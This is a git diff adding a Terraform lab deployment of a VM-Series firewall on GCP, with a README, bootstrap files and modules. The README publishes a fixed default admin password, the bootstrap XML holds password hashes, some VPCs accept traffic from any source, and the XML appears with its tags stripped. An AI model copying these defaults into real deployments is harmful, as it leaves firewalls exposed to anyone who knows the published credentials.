-variable "web_machine_type" {
- default = "f1-micro"
-}
-variable "web_nic0_ip" {
- default = "10.5.2.5"
-}
-################################################################################################################
-################################################################################################################
-# DB-VM VARIABLES
-variable "db_vm_name" {
- default = "db-vm"
-}
-variable "db_machine_type" {
- default = "f1-micro"
-}
-variable "db_nic0_ip" {
- default = "10.5.3.5"
-}
-variable "vm_image" {
- default = "ubuntu-os-cloud/ubuntu-1804-lts"
-}
-################################################################################################################
-################################################################################################################
-variable "fw_scopes" {
- default = [
- "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
- "https://www.googleapis.com/auth/devstorage.read_only",
- "https://www.googleapis.com/auth/logging.write",
- "https://www.googleapis.com/auth/monitoring.write",
- ]
-}
-
-variable "vm_scopes" {
- default = ["https://www.googleapis.com/auth/cloud.useraccounts.readonly",
- "https://www.googleapis.com/auth/devstorage.read_only",
- "https://www.googleapis.com/auth/logging.write",
- "https://www.googleapis.com/auth/monitoring.write",
- "https://www.googleapis.com/auth/compute.readonly",
- ]
-}
-
-
diff --git a/gcp/ilbnh-mig/README.md b/gcp/ilbnh-mig/README.md
new file mode 100644
index 00000000..e617ff44
--- /dev/null
+++ b/gcp/ilbnh-mig/README.md
@@ -0,0 +1,76 @@
+## MultiNic ILB Deployment
+This is a Terraform version of the manual build described at:
+https://cloud.google.com/load-balancing/docs/internal/setting-up-ilb-next-hop
+
+Terraform creates a VM-Series firewall that secures egress and east-west traffic for 2 internal VPCs. Egress traffic from the internal VPCs is routed via the Load Balancer as Next Hop to the VM-Series. The FW is deployed via a Managed Instance Group to allow for automatic failure detection/repacement.
+
+### Overview
+* 4 x VPCs (testing,management,production, production2)
+* 1 x VM-Series (BYOL / Bundle1 / Bundle2) in a Managed Instance Group
+* 1 x Ubuntu VM in the testing VPC (install Apache during creation)
+* 1 x Ubuntu VM in the production VPC (install Apache during creation)
+* 1 x GCP Internal Load Balancer in the testing VPC
+* 1 x GCP Internal Load Balancer in the production VPC
+* 1 x GCP Storage Bucket for VM-Series bootstrapping (random string appended to bucket name for global uniqueness)
+
+
+
+
+
+
+### Prerequistes
+1. Terraform
+2. Access to GCP Console
+
+After deployment, the firewalls' username and password are:
+ * **Username:** paloalto
+ * **Password:** Pal0Alt0@123
+
+### Deployment
+1. Download the **ilbnh-mig** repo to the machine running the build
+2. In an editor, open **terraform.tfvars** and set values for the following variables
+
+| Variable | Description |
+| :------------- | :------------- |
+| `project_id` | Project ID for the VM-Series, VM-Series VPCs, GCP storage bucket, & public load balancer. |
+| `public_key_path` | Public key used to authenticate to the FW (username: admin) and the Ubuntu VMs (username:demo) |
+| `fw_panos` | The species and version of the FW to deploy |
+| `auth_file`| Authentication key file for deployment |
+
+3. Download project authenication key files to the main directory of the terraform build.
+
+
+
+
+4. Execute Terraform
+```
+$ terraform init
+$ terraform plan
+$ terraform apply
+```
+
+5. After the deployment finishes, navigate to the console and not the public IP address associated with one of the ubuntu servers.
+
+
+
+
+
+6. Connect to the server and issue the curl command to its peer.
+
+
+
+
+
+7. Login to the FW and note the traffic logs.
+
+
+
+
+8. Destroy the envirnment when done.
+```
+$ terraform destroy
+```
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/gcp/ilbnh-mig/bootstrap_files/authcodes b/gcp/ilbnh-mig/bootstrap_files/authcodes
new file mode 100644
index 00000000..0519ecba
--- /dev/null
+++ b/gcp/ilbnh-mig/bootstrap_files/authcodes
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/bootstrap_files/bootstrap.xml b/gcp/ilbnh-mig/bootstrap_files/bootstrap.xml
new file mode 100644
index 00000000..a354ec4f
--- /dev/null
+++ b/gcp/ilbnh-mig/bootstrap_files/bootstrap.xml
@@ -0,0 +1,1099 @@
+
+
+
+
+
+
+
+ yes
+
+
+ $1$swuuvbfr$TeXPJ5vj8FQP5E9NiByN40
+
+
+
+
+ yes
+
+
+ $1$kpolrmjb$lJ5t7tCjS7Ghd8tachjOJ.
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDblNZOFdJbktrdGhVZnExdjFoSnlWdHhCSEpTYlRWQnhTTFBwYXg3MGUwRW5sZVZkdGk0VURLUFplREpQMVVxWjNYWjZIblk0L1NzQnhocFFXeW1LenpNYURqVnZ3TWhtcm04ampXYndRYXlqdEk4UVl0SnZNa1RhcHYwT2hWZTBmUUM5VXdTTnFHZ2FTKzVnUGdJRWVPaTB0a01OeU10VjY2bmhCL05ubktqc3RLSnoxYmt5K3RPUnQyeWNvYmdZWVJMdytRdWVLYmpHTkxFSTcrWkp5ak5URm8rUFAyaFZ4Q3hJL2ZzTnpvcTFjNjgyOXVkcmhwOUZsODhqbGNPSFdsYTUrMnRXS0VNVVRrKzY5eXZ3TmhrL3lvZ2F5VUFZZTJROXpEOG9pb2RzVnZSV29VOTk3dmt6TFE3c3FHT0VTYzk5a0xJTzFWaGtGalZHTDExSnogc3R1ZGVudC0wMy0wYWQ5MTllODQ2NmJAcXdpa2xhYnMubmV0
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 10
+
+
+ yes
+ 5
+
+
+
+ yes
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+
+
+ 100
+ yes
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ no
+
+ 1460
+
+ no
+
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ hc-tcp-22
+
+
+
+ no
+
+
+
+
+ hc-tcp-22
+
+
+
+ no
+
+
+
+
+ hc-tcp-22
+
+
+
+
+
+
+
+ 3
+ 5
+ wait-recover
+
+
+
+
+ no
+ yes
+
+
+
+
+
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+
+ 8
+
+
+
+
+ aes-128-cbc
+
+
+ sha256
+
+
+ group19
+
+
+ 8
+
+
+
+
+ aes-256-cbc
+
+
+ sha384
+
+
+ group20
+
+
+ 8
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+ 1
+
+
+
+
+
+ aes-128-gcm
+
+
+ none
+
+
+ group19
+
+ 1
+
+
+
+
+
+ aes-256-gcm
+
+
+ none
+
+
+ group20
+
+ 1
+
+
+
+
+
+
+ aes-128-cbc
+
+
+ sha1
+
+
+
+
+
+
+
+
+
+
+ real-time
+
+
+ high
+
+
+ high
+
+
+ medium
+
+
+ medium
+
+
+ low
+
+
+ low
+
+
+ low
+
+
+
+
+
+
+
+
+
+ no
+
+
+ 1.25
+ 0.5
+ 900
+ 300
+ 900
+ yes
+
+
+
+
+ yes
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+ ethernet1/1
+ loopback.1
+
+
+
+
+
+
+
+
+
+
+
+ 10.30.1.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/1
+ 10
+ Health-Check-Probe1
+
+
+
+
+
+
+ 10.30.1.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/1
+ 10
+ Health-Check-Probe2
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ trust2
+
+
+ None
+
+ 10
+ 10.50.1.0/24
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ trust3
+
+
+ None
+
+ 10
+ 10.40.1.0/24
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+ 10.50.1.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/2
+ 10
+ Health-Check-Probe1
+
+
+
+
+
+
+ 10.50.1.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/2
+ 10
+ Health-Check-Probe2
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ trust1
+
+
+ None
+
+ 10
+ 10.30.1.0/24
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ trust3
+
+
+ None
+
+ 10
+ 10.40.1.0/24
+
+
+
+
+
+
+
+
+ 120
+
+
+ ethernet1/2
+ loopback.2
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+ 10.40.1.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/3
+ 10
+ Health-Check-Probe1
+
+
+
+
+
+
+ 10.40.1.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/3
+ 10
+ Health-Check-Probe2
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ trust1
+
+
+ None
+
+ 10
+ 10.30.1.0/24
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ trust2
+
+
+ None
+
+ 10
+ 10.50.1.0/24
+
+
+
+
+
+
+
+
+ ethernet1/3
+ loopback.3
+
+
+
+
+
+
+ updates.paloaltonetworks.com
+
+
+
+
+ wednesday
+ 01:02
+ download-only
+
+
+
+
+ US/Pacific
+
+ yes
+ no
+
+ Multi-Nic-ILB
+
+
+ yes
+ no
+ no
+ no
+
+
+ yes
+
+
+
+
+ yes
+ 1
+
+
+
+
+
+ yes
+
+
+ FQDN
+
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDblNZOFdJbktrdGhVZnExdjFoSnlWdHhCSEpTYlRWQnhTTFBwYXg3MGUwRW5sZVZkdGk0VURLUFplREpQMVVxWjNYWjZIblk0L1NzQnhocFFXeW1LenpNYURqVnZ3TWhtcm04ampXYndRYXlqdEk4UVl0SnZNa1RhcHYwT2hWZTBmUUM5VXdTTnFHZ2FTKzVnUGdJRWVPaTB0a01OeU10VjY2bmhCL05ubktqc3RLSnoxYmt5K3RPUnQyeWNvYmdZWVJMdytRdWVLYmpHTkxFSTcrWkp5ak5URm8rUFAyaFZ4Q3hJL2ZzTnpvcTFjNjgyOXVkcmhwOUZsODhqbGNPSFdsYTUrMnRXS0VNVVRrKzY5eXZ3TmhrL3lvZ2F5VUFZZTJROXpEOG9pb2RzVnZSV29VOTk3dmt6TFE3c3FHT0VTYzk5a0xJTzFWaGtGalZHTDExSnogc3R1ZGVudC0wMy0wYWQ5MTllODQ2NmJAcXdpa2xhYnMubmV0
+
+
+ yes
+ no
+ no
+ no
+
+
+ multi-nic-ilb
+ mgmt-interface-swap
+
+
+
+
+
+
+
+
+
+
+
+
+ ethernet1/1
+ loopback.1
+
+
+
+
+
+
+ ethernet1/2
+ loopback.2
+
+
+
+
+
+
+ ethernet1/3
+ loopback.3
+
+
+
+
+
+
+
+
+ 22
+
+
+
+
+
+
+ 221
+
+
+
+
+
+
+ 222
+
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ Trust1
+ Trust2
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ application-default
+
+
+ any
+
+ allow
+ no
+ no
+
+
+
+ any
+
+
+ any
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ application-default
+
+
+ any
+
+ allow
+ yes
+
+
+
+
+
+
+
+
+
+ ethernet1/1
+
+
+
+
+ Trust1
+
+
+ any
+
+
+
+ any
+
+ any
+ no
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+ Trust2
+
+
+ any
+
+
+
+ any
+
+ any
+ no
+
+
+
+
+
+
+ deny
+ yes
+ yes
+
+
+ allow
+ yes
+ yes
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ critical
+
+ any
+ client
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ high
+
+ any
+ client
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ medium
+
+ any
+ client
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ critical
+
+ any
+ server
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ high
+
+ any
+ server
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ medium
+
+ any
+ server
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+
+
+ WW's profile
+
+
+
+
+
+
+
+ 35.191.0.0/16
+
+
+ 130.211.0.0/22
+
+
+ 10.50.1.0/24
+
+
+ 10.30.1.0/24
+
+
+
+
+
+ ethernet1/1
+ loopback.1
+ ethernet1/2
+ loopback.2
+ ethernet1/3
+ loopback.3
+
+
+
+
+
+
+ Health-Check-Probe1
+ Health-Check-Probe2
+
+
+
+
+
+
+
+
diff --git a/gcp/ilbnh-mig/bootstrap_files/init-cfg.txt b/gcp/ilbnh-mig/bootstrap_files/init-cfg.txt
new file mode 100644
index 00000000..5b9c168b
--- /dev/null
+++ b/gcp/ilbnh-mig/bootstrap_files/init-cfg.txt
@@ -0,0 +1,10 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=packet-mirroring
+op-command-modes=mgmt-interface-swap
+dns-primary=
+dns-secondary=
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/fw_common.tf b/gcp/ilbnh-mig/fw_common.tf
new file mode 100644
index 00000000..aeaa685c
--- /dev/null
+++ b/gcp/ilbnh-mig/fw_common.tf
@@ -0,0 +1,106 @@
+#-----------------------------------------------------------------------------------------------
+# Create bootstrap bucket for firewalls
+module "bootstrap_common" {
+ source = "./modules/gcp_bootstrap/"
+ bucket_name = "fw-bootstrap-common"
+ file_location = "bootstrap_files/"
+ config = ["init-cfg.txt", "bootstrap.xml"]
+# config = ["init-cfg.txt"]
+ license = ["authcodes"]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create firewall template
+#-----------------------------------------------------------------------------------------------
+module "fw_common" {
+ source = "./modules/vmseries/"
+ base_name = var.fw_base_name
+ region = var.region
+ target_size = var.target_size
+ zones = [
+ data.google_compute_zones.available.names[0],
+ data.google_compute_zones.available.names[1]
+ ]
+ networks = [
+ module.vpc0.network_self_link,
+ module.vpc1.network_self_link,
+ module.vpc2.network_self_link,
+ module.vpc3.network_self_link
+ ]
+ subnetworks = [
+ module.vpc0.subnetwork_self_link,
+ module.vpc1.subnetwork_self_link,
+ module.vpc2.subnetwork_self_link,
+ module.vpc3.subnetwork_self_link
+ ]
+ machine_type = var.fw_machine_type
+ bootstrap_bucket = module.bootstrap_common.bucket_name
+ mgmt_interface_swap = "enable"
+ ssh_key = fileexists(var.public_key_path) ? "admin:${file(var.public_key_path)}" : ""
+ image = "${var.fw_image}-${var.fw_panos}"
+ nic0_public_ip = false
+ nic1_public_ip = true
+ nic2_public_ip = false
+ nic3_public_ip = false
+ create_instance_group = true
+
+ dependencies = [
+ module.bootstrap_common.completion,
+ ]
+}
+
+resource "google_compute_health_check" "hc_ssh_22" {
+ name = "hc-ssh-22"
+
+ tcp_health_check {
+ port = var.health_check_port
+ }
+}
+
+module "ilb1" {
+ source = "./modules/ilbnh/"
+ name = "ilb1"
+ project_id = var.project_id
+ all_ports = true
+ ports = []
+ health_checks = [google_compute_health_check.hc_ssh_22.self_link]
+ region = var.region
+ network = module.vpc0.vpc_id
+ network_uri = module.vpc0.network_self_link
+ subnetwork = module.vpc0.subnetwork_self_link
+ ip_address = var.ilb1_ip
+ group = module.fw_common.vmseries_rigm
+}
+
+module "ilb2" {
+ source = "./modules/ilbnh/"
+ name = "ilb2"
+ project_id = var.project_id
+ all_ports = true
+ ports = []
+ health_checks = [google_compute_health_check.hc_ssh_22.self_link]
+ region = var.region
+ network = module.vpc2.vpc_id
+ network_uri = module.vpc2.network_self_link
+ subnetwork = module.vpc2.subnetwork_self_link
+ ip_address = var.ilb2_ip
+ group = module.fw_common.vmseries_rigm
+ }
+
+#-----------------------------------------------------------------------------------------------
+# Create routes route to internal LBs.
+resource "google_compute_route" "ilb_nhop_dest_10_30_1" {
+ name = "ilb-nhop-dest-10-30-1"
+ dest_range = "10.30.1.0/24"
+ network = module.vpc2.network_self_link
+ next_hop_ilb = module.ilb2.forwarding_rule
+ priority = 99
+}
+
+resource "google_compute_route" "ilb_nhop_dest_10_50_1" {
+ name = "ilb-nhop-dest-10-50-1"
+ dest_range = "10.50.1.0/24"
+ network = module.vpc0.network_self_link
+ next_hop_ilb = module.ilb1.forwarding_rule
+ priority = 99
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/fw_vpc.tf b/gcp/ilbnh-mig/fw_vpc.tf
new file mode 100644
index 00000000..230a66c0
--- /dev/null
+++ b/gcp/ilbnh-mig/fw_vpc.tf
@@ -0,0 +1,40 @@
+#-----------------------------------------------------------------------------------------------
+# Create firewall VPCs & subnets
+module "vpc0" {
+ source = "./modules/vpc/"
+ vpc = var.vpc0
+ subnet = var.vpc0_subnet
+ cidr = var.vpc0_cidr
+ region = var.region
+ allowed_sources = ["0.0.0.0/0"]
+}
+
+module "vpc1" {
+ source = "./modules/vpc/"
+ vpc = var.vpc1
+ subnet = var.vpc1_subnet
+ cidr = var.vpc1_cidr
+ region = var.region
+ allowed_sources = var.mgmt_sources
+ allowed_protocol = "TCP"
+ allowed_ports = ["443", "22"]
+}
+
+module "vpc2" {
+ source = "./modules/vpc/"
+ vpc = var.vpc2
+ subnet = var.vpc2_subnet
+ cidr = var.vpc2_cidr
+ region = var.region
+ allowed_sources = ["0.0.0.0/0"]
+}
+
+module "vpc3" {
+ source = "./modules/vpc/"
+ vpc = var.vpc3
+ subnet = var.vpc3_subnet
+ cidr = var.vpc3_cidr
+ region = var.region
+ allowed_sources = ["0.0.0.0/0"]
+ delete_default_route = true
+}
diff --git a/gcp/ilbnh-mig/images/curl.png b/gcp/ilbnh-mig/images/curl.png
new file mode 100644
index 00000000..e17b875c
Binary files /dev/null and b/gcp/ilbnh-mig/images/curl.png differ
diff --git a/gcp/ilbnh-mig/images/deployment.png b/gcp/ilbnh-mig/images/deployment.png
new file mode 100644
index 00000000..636f95d1
Binary files /dev/null and b/gcp/ilbnh-mig/images/deployment.png differ
diff --git a/gcp/ilbnh-mig/images/diagram.svg b/gcp/ilbnh-mig/images/diagram.svg
new file mode 100644
index 00000000..d68679f4
--- /dev/null
+++ b/gcp/ilbnh-mig/images/diagram.svg
@@ -0,0 +1,805 @@
+
+
+
diff --git a/gcp/ilbnh-mig/images/directory.png b/gcp/ilbnh-mig/images/directory.png
new file mode 100644
index 00000000..8317ff94
Binary files /dev/null and b/gcp/ilbnh-mig/images/directory.png differ
diff --git a/gcp/ilbnh-mig/images/fwlogs.png b/gcp/ilbnh-mig/images/fwlogs.png
new file mode 100644
index 00000000..52ea690c
Binary files /dev/null and b/gcp/ilbnh-mig/images/fwlogs.png differ
diff --git a/gcp/ilbnh-mig/modules/gcp_bootstrap/main.tf b/gcp/ilbnh-mig/modules/gcp_bootstrap/main.tf
new file mode 100644
index 00000000..a93e7956
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/gcp_bootstrap/main.tf
@@ -0,0 +1,85 @@
+locals {
+ bucket_name = join("", [var.bucket_name, random_string.randomstring.result])
+}
+resource "random_string" "randomstring" {
+ length = 25
+ min_lower = 15
+ min_numeric = 10
+ special = false
+}
+
+resource "google_storage_bucket" "bootstrap" {
+ name = local.bucket_name
+ force_destroy = true
+}
+
+resource "google_storage_bucket_object" "config_full" {
+ count = length(var.config) > 0 ? length(var.config) : "0"
+ name = "config/${element(var.config, count.index)}"
+ source = "${var.file_location}${element(var.config, count.index)}"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "content_full" {
+ count = length(var.content) > 0 ? length(var.content) : "0"
+ name = "content/${element(var.content, count.index)}"
+ source = "${var.file_location}${element(var.content, count.index)}"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "license_full" {
+ count = length(var.license) > 0 ? length(var.license) : "0"
+ name = "license/${element(var.license, count.index)}"
+ source = "${var.file_location}${element(var.license, count.index)}"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "software_full" {
+ count = length(var.software) > 0 ? length(var.software) : "0"
+ name = "software/${element(var.software, count.index)}"
+ source = "${var.file_location}${element(var.software, count.index)}"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "config_empty" {
+ count = length(var.config) == 0 ? 1 : 0
+ name = "config/"
+ content = "config/"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "content_empty" {
+ count = length(var.content) == 0 ? 1 : 0
+ name = "content/"
+ content = "content/"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "license_empty" {
+ count = length(var.license) == 0 ? 1 : 0
+ name = "license/"
+ content = "license/"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "software_empty" {
+ count = length(var.software) == 0 ? 1 : 0
+ name = "software/"
+ content = "software/"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "null_resource" "dependency_setter" {
+ depends_on = [
+ google_storage_bucket.bootstrap,
+ google_storage_bucket_object.config_full,
+ google_storage_bucket_object.content_full,
+ google_storage_bucket_object.license_full,
+ google_storage_bucket_object.software_full,
+ google_storage_bucket_object.config_empty,
+ google_storage_bucket_object.content_empty,
+ google_storage_bucket_object.license_empty,
+ google_storage_bucket_object.software_empty,
+ ]
+}
+
diff --git a/gcp/ilbnh-mig/modules/gcp_bootstrap/outputs.tf b/gcp/ilbnh-mig/modules/gcp_bootstrap/outputs.tf
new file mode 100644
index 00000000..ef7f162d
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/gcp_bootstrap/outputs.tf
@@ -0,0 +1,8 @@
+output completion {
+ value = null_resource.dependency_setter.id
+}
+
+output bucket_name {
+ value = google_storage_bucket.bootstrap.name
+}
+
diff --git a/gcp/ilbnh-mig/modules/gcp_bootstrap/variables.tf b/gcp/ilbnh-mig/modules/gcp_bootstrap/variables.tf
new file mode 100644
index 00000000..0db2b8fd
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/gcp_bootstrap/variables.tf
@@ -0,0 +1,24 @@
+variable bucket_name {
+}
+
+variable file_location {
+}
+
+variable config {
+ type = list(string)
+ default = []
+}
+
+variable content {
+ type = list(string)
+ default = []
+}
+
+variable license {
+ type = list(string)
+ default = []
+}
+
+variable software {
+ default = []
+}
diff --git a/gcp/ilbnh-mig/modules/ilbnh/main.tf b/gcp/ilbnh-mig/modules/ilbnh/main.tf
new file mode 100644
index 00000000..e3491df0
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/ilbnh/main.tf
@@ -0,0 +1,27 @@
+#-----------------------------------------------------------------------------------------------
+# Create the internal load balancers, one for the testing network and one for the production network.
+# This resource will destroy (potentially immediately) after null_resource.next
+resource "google_compute_region_backend_service" "default" {
+ provider = "google-beta"
+ name = var.name
+ project = var.project_id
+ load_balancing_scheme = "INTERNAL"
+ health_checks = var.health_checks
+ region = var.region
+ network = var.network_uri
+
+ backend {
+ group = var.group
+ }
+}
+
+resource "google_compute_forwarding_rule" "default" {
+ name = "fr-${var.name}"
+ region = var.region
+ load_balancing_scheme = "INTERNAL"
+ backend_service = google_compute_region_backend_service.default.id
+ all_ports = var.all_ports
+ network = var.network
+ subnetwork = var.subnetwork
+ ip_address = var.ip_address
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/ilbnh/outputs.tf b/gcp/ilbnh-mig/modules/ilbnh/outputs.tf
new file mode 100644
index 00000000..d99cc408
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/ilbnh/outputs.tf
@@ -0,0 +1,3 @@
+output forwarding_rule {
+ value = google_compute_forwarding_rule.default.self_link
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/ilbnh/variables.tf b/gcp/ilbnh-mig/modules/ilbnh/variables.tf
new file mode 100644
index 00000000..585f8276
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/ilbnh/variables.tf
@@ -0,0 +1,41 @@
+variable project_id {
+}
+
+variable region {
+}
+
+variable name {
+}
+
+variable health_checks {
+ type = list(string)
+ default = []
+}
+
+variable group {
+}
+
+variable subnetwork {
+}
+
+variable ip_address {
+ default = null
+}
+
+variable ip_protocol {
+ default = "TCP"
+}
+variable all_ports {
+ type = bool
+}
+variable ports {
+ type = list(string)
+ default = []
+}
+
+variable network {
+ default = null
+}
+
+variable network_uri {
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vm/main.tf b/gcp/ilbnh-mig/modules/vm/main.tf
new file mode 100644
index 00000000..fff23b2e
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vm/main.tf
@@ -0,0 +1,34 @@
+resource "google_compute_instance" "default" {
+ count = length(var.names)
+ name = element(var.names, count.index)
+ machine_type = var.machine_type
+ zone = element(var.zones, count.index)
+ can_ip_forward = false
+ allow_stopping_for_update = true
+ metadata_startup_script = var.startup_script
+
+ metadata = {
+ serial-port-enable = true
+ ssh-keys = var.ssh_key
+ }
+
+ network_interface {
+ dynamic "access_config" {
+ for_each = var.server_public_ip ? [""] : []
+ content {}
+ }
+ subnetwork = element(var.subnetworks, count.index)
+ network_ip = element(var.server_ips, count.index)
+
+ }
+
+ boot_disk {
+ initialize_params {
+ image = var.image
+ }
+ }
+
+ service_account {
+ scopes = var.scopes
+ }
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vm/outputs.tf b/gcp/ilbnh-mig/modules/vm/outputs.tf
new file mode 100644
index 00000000..75856670
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vm/outputs.tf
@@ -0,0 +1,7 @@
+output vm_names {
+ value = google_compute_instance.default.*.name
+}
+
+output vm_self_link {
+ value = google_compute_instance.default.*.self_link
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vm/variables.tf b/gcp/ilbnh-mig/modules/vm/variables.tf
new file mode 100644
index 00000000..76b51bf5
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vm/variables.tf
@@ -0,0 +1,44 @@
+variable names {
+ type = list(string)
+}
+
+variable machine_type {
+}
+
+variable zones {
+ type = list(string)
+}
+variable ssh_key {
+ default = ""
+}
+variable image {
+}
+
+variable subnetworks {
+ type = list(string)
+}
+
+variable server_ips {
+ type = list(string)
+}
+
+variable scopes {
+ type = list(string)
+
+ default = [
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+}
+
+variable startup_script {
+ default = ""
+}
+
+variable server_public_ip {
+ type = bool
+ default = false
+}
+
diff --git a/gcp/ilbnh-mig/modules/vmseries/main.tf b/gcp/ilbnh-mig/modules/vmseries/main.tf
new file mode 100644
index 00000000..0b78dd00
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vmseries/main.tf
@@ -0,0 +1,84 @@
+resource "google_compute_instance_template" "vmseries" {
+ name = "vmseries-template"
+ description = "This template is used to create firewall instances."
+ instance_description = "VM-Series for ILBNH"
+ region = var.region
+ machine_type = var.machine_type
+ min_cpu_platform = var.cpu_platform
+ can_ip_forward = true
+ tags = var.tags
+
+ scheduling {
+ automatic_restart = true
+ on_host_maintenance = "MIGRATE"
+ }
+
+ metadata = {
+ mgmt-interface-swap = var.mgmt_interface_swap
+ vmseries-bootstrap-gce-storagebucket = var.bootstrap_bucket
+ serial-port-enable = true
+ ssh-keys = var.ssh_key
+ }
+
+ service_account {
+ scopes = var.scopes
+ }
+
+ network_interface {
+
+ dynamic "access_config" {
+ for_each = var.nic0_public_ip ? [""] : []
+ content {}
+ }
+ subnetwork = var.subnetworks[0]
+ }
+
+ network_interface {
+ dynamic "access_config" {
+ for_each = var.nic1_public_ip ? [""] : []
+ content {}
+ }
+ subnetwork = var.subnetworks[1]
+ }
+
+ network_interface {
+ dynamic "access_config" {
+ for_each = var.nic2_public_ip ? [""] : []
+ content {}
+ }
+ subnetwork = var.subnetworks[2]
+ }
+
+ network_interface {
+ dynamic "access_config" {
+ for_each = var.nic3_public_ip ? [""] : []
+ content {}
+ }
+ subnetwork = var.subnetworks[3]
+ }
+
+ disk {
+ source_image = var.image
+ type = var.disk_type
+ }
+
+ lifecycle {
+ create_before_destroy = "true"
+ }
+}
+
+resource "google_compute_region_instance_group_manager" "vmseries_rigm" {
+ name = "vmseries-rigm"
+ base_instance_name = var.base_name
+ region = var.region
+ target_size = var.target_size
+
+ version {
+ instance_template = google_compute_instance_template.vmseries.self_link
+ }
+
+ named_port {
+ name = "http"
+ port = "80"
+ }
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vmseries/outputs.tf b/gcp/ilbnh-mig/modules/vmseries/outputs.tf
new file mode 100644
index 00000000..11bd3b53
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vmseries/outputs.tf
